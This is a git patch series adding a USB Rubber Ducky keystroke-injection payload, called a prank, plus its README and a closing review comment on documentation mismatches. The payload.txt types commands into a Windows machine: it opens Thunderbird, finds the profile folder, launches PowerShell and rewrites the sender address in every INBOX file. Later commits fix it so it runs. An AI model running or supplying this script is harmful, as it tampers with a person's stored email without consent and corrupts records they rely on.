From ef82f851a2ca51389e32634755e321aee15227b5 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 09:09:06 +0200 Subject: [PATCH 1/9] Prank In The Middle - Thunderbird The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists. --- .../Prank_In_The_Middle_Thunderbird/README.md | 95 +++++++++++++++ .../payload.txt | 112 ++++++++++++++++++ 2 files changed, 207 insertions(+) create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md create mode 100644 payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md new file mode 100644 index 000000000..a569d26ad --- /dev/null +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/README.md 
@@ -0,0 +1,95 @@ +# Prank In The Middle - Thunderbird + +The name of the payload `Prank In The Middle` is named after the pun Prank + Man In The Middle in that this operation, in some ways, can remotely be configured as a MITM attack but since it was created specifically for playful purposes then here is the reason for the union with the word Prank. + +**Category**: Prank + +**Plug-And-Play** ^^ + +## Index + +- [Description](#description) +- [Requirements](#requirements) +- [How the Program Works](#how-the-program-works) +- [Code Details](#code-details) + - [System Detection && Short Start DELAY](#system-detection--short-start-delay) + - [Navigating in Thunderbird](#navigating-in-thunderbird) + - [Opening PowerShell and Email Manipulation](#opening-powershell-and-email-manipulation) + - [The Regex](#the-regex) +- [Notes](#notes) +- [Credits](#credits) + +## Description + +This program automates a series of actions on a Windows system (*tested on Windows 10 but should works in Windows 11*) to manipulate the contents of emails found in a Thunderbird profile. Specifically, it identifies emails in the `INBOX` file of each configured email account and replaces the sender's email addresses with a fictitious address `Rick.Roll@tinyurl.com/prinkrollme` where `prinkrollme` is the union of the words `Prank`, `Rick Roll` and `Me` (*this one was necessary becouse prinkwoll era già stato preso* **:c** *so sad...* ) all compressed into the link `tinyurl.com/prinkrollme` ([*3° note*](#notes)) that redirect to the YouTube video `https://www.youtube.com/watch?v=xMHJGd3wwZk`. + +![](https://i.ibb.co/VJjfbkJ/1.png) + +## Requirements + +- A Windows system with Thunderbird installed. +- Access to PowerShell. +- Permissions to run code in Powershell + +## Test Environment + +- Thunderbird 115.11.1 (64 bit) +- Windows 10 Pro + +## How the Program Works + +1. **System Detection:** The program detects if the system reflects the CAPSLOCK state and sets a dynamic delay based on this. +2. 
**Opening Thunderbird:** Uses a series of commands to open Thunderbird and navigate to the profile folder settings. +3. **Copying the Profile Folder Path:** Copies the profile folder path to the clipboard. +4. **Opening PowerShell:** Opens a PowerShell window and navigates to the `ImapMail` folder of the Thunderbird profile. +5. **Email Manipulation:** Uses PowerShell to: + - Find all `INBOX` folders within `ImapMail`. + - Read the contents of the emails in `INBOX`. + - Replace the sender addresses with `Rick Roll `. + - Save the modified content back to the original email files. + +## Code Details + +For reasons of space, the code is not given in the documentation. However, comments can be found that broadly explain the piece of code that is executed following the comment itself. + +### The Regex + +The regex was not created from scratch but was taken from the discussion “[How can I validate an email address using a regular expression?](https://stackoverflow.com/questions/201323/how-can-i-validate-an-email-address-using-a-regular-expression)” posted on **StackOverflow**. + +```plaintext +(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\]) +``` + +The only difference is the addition of `**From: <...>**` which reduces to just the email addresses that sent the emails and not all addresses detected in the file that might depict other references + +```plaintext +From:\s.*\s<...> +``` + +## Notes + +1) This program was created for educational and demonstrative purposes. Unauthorized alteration of emails is illegal, and violating others' privacy is a crime. 
+2) Ensure you have the necessary permissions before running any script that modifies personal or sensitive data. +3) Considering [Staged Payloads](https://github.com/hak5/usbrubberducky-payloads?tab=readme-ov-file#staged-payloads), generally, it is not possible to include code that downloads from external sources. In this case, however, the setup involves a redirect to a YouTube video, which has been conveniently shortened using `tiny.url`. It is important to note that this redirect can be modified, and I strongly recommend changing it to a personal link for your security. While I assure you that I will never alter the link, no one can guarantee that I won't be compromised, allowing someone else to alter the redirect. It is always advisable and a good practice to never use links found online without understanding the actual redirect and replacing it with your own link. + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt new file mode 100644 index 000000000..74bd0e33d --- /dev/null +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt 
@@ -0,0 +1,112 @@ +* REM ################################################### +* REM # # +* REM # Title : Prank In The Middle - Thunderbird # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Prank # +* REM # Target : Windows 10/11 # +* REM # # +* REM ################################################### + +* REM Open Thunderbird and goto settings +QUACK WIN r +QUACK STRING thunderbird +QUACK ENTER +QUACK DELAY 1000 +QUACK REPEAT 4 TAB +QUACK ENTER +QUACK DELAY 500 +QUACK REPEAT 2 UPARROW +QUACK ENTER +QUACK DELAY 500 +QUACK REPEAT 3 UPARROW +QUACK ENTER +QUACK DELAY 500 + +* REM Goto profile directory +QUACK REPEAT 11 TAB +QUACK ENTER +QUACK DELAY 500 + +*REM Copy the directory path +QUACK REPEAT 4 TAB +QUACK DELAY 500 +QUACK SPACEBAR +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK CTRL c +QUACK DELAY 500 +QUACK ALT F4 +QUACK DELAY 500 + +* REM Open the powershell and goto the directory +QUACK WIN r +QUACK STRING powershell +QUACK ENTER +QUACK DELAY 1500 +QUACK STRING cd +QUACK DELAY 500 +QUACK CTRL v +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 + +* REM Get the INBOX content and edit it overwriting. 
Then close the powershell +QUACK STRING cd ImapMail +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $directories = Get-ChildItem -Directory | Select-Object FullName +QUACK ENTER +QUACK DELAY 500 +QUACK STRING foreach ($dir in $directories) { +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Replace backslashes with slash +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $newPath = $dir.FullName -replace '\\', '/' +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Add the sub-string “/INBOX” to the end +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $newPath += "/INBOX" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Check whether the INBOX file exists +QUACK ENTER +QUACK DELAY 500 +QUACK STRING if (Test-Path $newPath) { +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Check whether the INBOX file exists +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $emails = Get-Content -Path $newPath -Raw +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Replace email sender with Rick Roll! +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # The following operation is simplified and assumes that the sender starts with “From: ...” +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # and does not contain complex MIME structures +QUACK ENTER +QUACK DELAY 500 +QUACK STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " +QUACK ENTER +QUACK DELAY 500 +QUACK STRING # Write the modified content into the INBOX file. 
+QUACK ENTER +QUACK DELAY 500 +QUACK STRING Set-Content -Path $newPath -Value $modifiedEmails -Force +QUACK ENTER +QUACK DELAY 500 +QUACK STRING } +QUACK ENTER +QUACK DELAY 500 +QUACK STRING } +QUACK DELAY 1000 +QUACK ALT F4 \ No newline at end of file From 0317f9e286621fdeeaf8ef0ab5e6e8f252386735 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 09:15:25 +0200 Subject: [PATCH 2/9] Update payload.txt --- .../library/prank/Prank_In_The_Middle_Thunderbird/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 74bd0e33d..576de8d66 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -108,5 +108,6 @@ QUACK STRING } QUACK ENTER QUACK DELAY 500 QUACK STRING } +QUACK ENTER QUACK DELAY 1000 -QUACK ALT F4 \ No newline at end of file +QUACK ALT F4 From 9e67b9069c60bf254bec8e6f0309efd2cc5151ab Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 3 Jun 2024 12:17:38 +0200 Subject: [PATCH 3/9] Removed DS3 stuff --- .../payload.txt | 26 +++++++++++++++---- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 576de8d66..79788efcb 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt 
@@ -16,20 +16,36 @@ QUACK DELAY 1000 QUACK REPEAT 4 TAB QUACK ENTER QUACK DELAY 500 -QUACK REPEAT 2 UPARROW +QUACK UPARROW +QUACK UPARROW QUACK ENTER QUACK DELAY 500 -QUACK REPEAT 3 UPARROW +QUACK UPARROW +QUACK UPARROW +QUACK UPARROW QUACK ENTER QUACK DELAY 500 * REM Goto profile directory -QUACK REPEAT 11 TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB QUACK ENTER QUACK DELAY 500 -*REM Copy the directory path -QUACK REPEAT 4 TAB +* REM Copy the directory path +QUACK TAB +QUACK TAB +QUACK TAB +QUACK TAB QUACK DELAY 500 QUACK SPACEBAR QUACK DELAY 500 From 02304ac5670b7b34063b3f62806cb152c3b1dae9 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 4 Jun 2024 07:43:13 +0200 Subject: [PATCH 4/9] Update payload.txt --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 79788efcb..91271700f 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -9,7 +9,7 @@ * REM ################################################### * REM Open Thunderbird and goto settings -QUACK WIN r +QUACK GUI r QUACK STRING thunderbird QUACK ENTER QUACK DELAY 1000 @@ -47,7 +47,7 @@ QUACK TAB QUACK TAB QUACK TAB QUACK DELAY 500 -QUACK SPACEBAR +QUACK SPACE QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 @@ -57,7 +57,7 @@ QUACK ALT F4 QUACK DELAY 500 * REM Open the powershell and goto the directory -QUACK WIN r +QUACK GUI r QUACK STRING powershell QUACK ENTER QUACK DELAY 1500 From 46d7a77aa4fdc730c12cef1959f94a4bb1231dfc Mon Sep 17 00:00:00 2001 
From: Aleff Date: Thu, 6 Jun 2024 10:08:33 +0200 Subject: [PATCH 5/9] [~] From " to ' --- .../Prank_In_The_Middle_Thunderbird/payload.txt | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 91271700f..655e2b38a 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -1,11 +1,11 @@ * REM ################################################### -* REM # # +* REM # # * REM # Title : Prank In The Middle - Thunderbird # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : Prank # -* REM # Target : Windows 10/11 # -* REM # # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Prank # +* REM # Target : Windows 10/11 # +* REM # # * REM ################################################### * REM Open Thunderbird and goto settings @@ -87,7 +87,7 @@ QUACK DELAY 500 QUACK STRING # Add the sub-string “/INBOX” to the end QUACK ENTER QUACK DELAY 500 -QUACK STRING $newPath += "/INBOX" +QUACK STRING $newPath += '/INBOX' QUACK ENTER QUACK DELAY 500 QUACK STRING # Check whether the INBOX file exists 
@@ -111,7 +111,7 @@ QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace "From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>", "From: Rick Roll " +QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`'(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`')@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. From 62bf9d16ca888975f916bbb070ce570664a20f4a Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 10:25:16 +0200 Subject: [PATCH 6/9] [~] From " to ' --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 655e2b38a..8f3aefb1d 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt 
@@ -84,7 +84,7 @@ QUACK DELAY 500 QUACK STRING $newPath = $dir.FullName -replace '\\', '/' QUACK ENTER QUACK DELAY 500 -QUACK STRING # Add the sub-string “/INBOX” to the end +QUACK STRING # Add the sub-string '/INBOX' to the end QUACK ENTER QUACK DELAY 500 QUACK STRING $newPath += '/INBOX' @@ -105,13 +105,13 @@ QUACK DELAY 500 QUACK STRING # Replace email sender with Rick Roll! QUACK ENTER QUACK DELAY 500 -QUACK STRING # The following operation is simplified and assumes that the sender starts with “From: ...” +QUACK STRING # The following operation is simplified and assumes that the sender starts with 'From: ...' QUACK ENTER QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|`'(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`')@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' +QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. From 358e3ad6f95aedcec3c5976253feacca8b23cc41 Mon Sep 17 00:00:00 2001 
From: Aleff Date: Thu, 6 Jun 2024 15:52:22 +0200 Subject: [PATCH 7/9] Update payload.txt [+] ATTACKMODE HID --- .../prank/Prank_In_The_Middle_Thunderbird/payload.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index 8f3aefb1d..d1aa48f62 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt @@ -2,12 +2,14 @@ * REM # # * REM # Title : Prank In The Middle - Thunderbird # * REM # Author : Aleff # -* REM # Version : 1.0 # +* REM # Version : 1.0 # * REM # Category : Prank # -* REM # Target : Windows 10/11 # +* REM # Target : Windows 10/11 # * REM # # * REM ################################################### +ATTACKMODE HID + * REM Open Thunderbird and goto settings QUACK GUI r QUACK STRING thunderbird From 6c5b186447c3ff79f6547e55b789f3b0d73b5c91 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 12:00:24 +0200 Subject: [PATCH 8/9] Update payload.txt --- .../library/prank/Prank_In_The_Middle_Thunderbird/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index d1aa48f62..b2d965d52 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt 
@@ -113,7 +113,7 @@ QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' +QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. From fdf3e69142f87c0e5e92aec77c9fb8894ea05931 Mon Sep 17 00:00:00 2001 From: Aleff Date: Tue, 11 Jun 2024 07:56:31 +0200 Subject: [PATCH 9/9] $ -> \$ --- .../payload.txt | 45 ++++++++++--------- 1 file changed, 23 insertions(+), 22 deletions(-) diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt index b2d965d52..ab2e6fd58 100644 --- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt +++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt 
@@ -1,16 +1,17 @@ -* REM ################################################### -* REM # # -* REM # Title : Prank In The Middle - Thunderbird # -* REM # Author : Aleff # -* REM # Version : 1.0 # -* REM # Category : Prank # -* REM # Target : Windows 10/11 # -* REM # # -* REM ################################################### +################################################### +# # +# Title : Prank In The Middle - Thunderbird # +# Author : Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows 10/11 # +# # +################################################### ATTACKMODE HID -* REM Open Thunderbird and goto settings +# Open Thunderbird and goto settings +QUACK DELAY 1500 QUACK GUI r QUACK STRING thunderbird QUACK ENTER @@ -28,7 +29,7 @@ QUACK UPARROW QUACK ENTER QUACK DELAY 500 -* REM Goto profile directory +# Goto profile directory QUACK TAB QUACK TAB QUACK TAB @@ -43,7 +44,7 @@ QUACK TAB QUACK ENTER QUACK DELAY 500 -* REM Copy the directory path +# Copy the directory path QUACK TAB QUACK TAB QUACK TAB @@ -58,7 +59,7 @@ QUACK DELAY 500 QUACK ALT F4 QUACK DELAY 500 -* REM Open the powershell and goto the directory +# Open the powershell and goto the directory QUACK GUI r QUACK STRING powershell QUACK ENTER 
@@ -70,38 +71,38 @@ QUACK DELAY 500 QUACK ENTER QUACK DELAY 500 -* REM Get the INBOX content and edit it overwriting. Then close the powershell +# Get the INBOX content and edit it overwriting. Then close the powershell QUACK STRING cd ImapMail QUACK ENTER QUACK DELAY 500 -QUACK STRING $directories = Get-ChildItem -Directory | Select-Object FullName +QUACK STRING \$directories = Get-ChildItem -Directory | Select-Object FullName QUACK ENTER QUACK DELAY 500 -QUACK STRING foreach ($dir in $directories) { +QUACK STRING foreach (\$dir in \$directories) { QUACK ENTER QUACK DELAY 500 QUACK STRING # Replace backslashes with slash QUACK ENTER QUACK DELAY 500 -QUACK STRING $newPath = $dir.FullName -replace '\\', '/' +QUACK STRING \$newPath = \$dir.FullName -replace '\\', '/' QUACK ENTER QUACK DELAY 500 QUACK STRING # Add the sub-string '/INBOX' to the end QUACK ENTER QUACK DELAY 500 -QUACK STRING $newPath += '/INBOX' +QUACK STRING \$newPath += '/INBOX' QUACK ENTER QUACK DELAY 500 QUACK STRING # Check whether the INBOX file exists QUACK ENTER QUACK DELAY 500 -QUACK STRING if (Test-Path $newPath) { +QUACK STRING if (Test-Path \$newPath) { QUACK ENTER QUACK DELAY 500 QUACK STRING # Check whether the INBOX file exists QUACK ENTER QUACK DELAY 500 -QUACK STRING $emails = Get-Content -Path $newPath -Raw +QUACK STRING \$emails = Get-Content -Path \$newPath -Raw QUACK ENTER QUACK DELAY 500 QUACK STRING # Replace email sender with Rick Roll! 
@@ -113,13 +114,13 @@ QUACK DELAY 500 QUACK STRING # and does not contain complex MIME structures QUACK ENTER QUACK DELAY 500 -QUACK STRING $modifiedEmails = $emails -replace 'From:\s.*\s<(?:[a-z0-9!#$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&*+/=?^_`{|}~-]+)*|`\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' +QUACK STRING \$modifiedEmails = \$emails -replace 'From:\s.*\s<(?:[a-z0-9!#\$%&*+/=?^_`{|}~-]+(?:\.[a-z0-9!#\$%&*+/=?^_`{|}~-]+)*|`\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*`\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])>', 'From: Rick Roll ' QUACK ENTER QUACK DELAY 500 QUACK STRING # Write the modified content into the INBOX file. QUACK ENTER QUACK DELAY 500 -QUACK STRING Set-Content -Path $newPath -Value $modifiedEmails -Force +QUACK STRING Set-Content -Path \$newPath -Value \$modifiedEmails -Force QUACK ENTER QUACK DELAY 500 QUACK STRING }
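Review bot: In PATCH 1/9's README.md hunk, the Index links to `#system-detection--short-start-delay`, `#navigating-in-thunderbird` and `#opening-powershell-and-email-manipulation`, but `## Code Details` contains only `### The Regex`, so those three entries point at nothing. Add the sections or drop the entries, and list `Test Environment`, which is missing from the Index. Step 1 of `How the Program Works` describes CAPSLOCK-based detection and a dynamic delay, yet payload.txt in the same patch uses only fixed `QUACK DELAY` values, so that step should be removed or marked as not implemented. The regex printed under `### The Regex` is also not the one the payload types: its bracketed-IPv4 final octet lacks the `1[0-9][0-9]` alternative that payload.txt has. The Description still carries an untranslated fragment (`era già stato preso`) plus `becouse` and `should works`.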
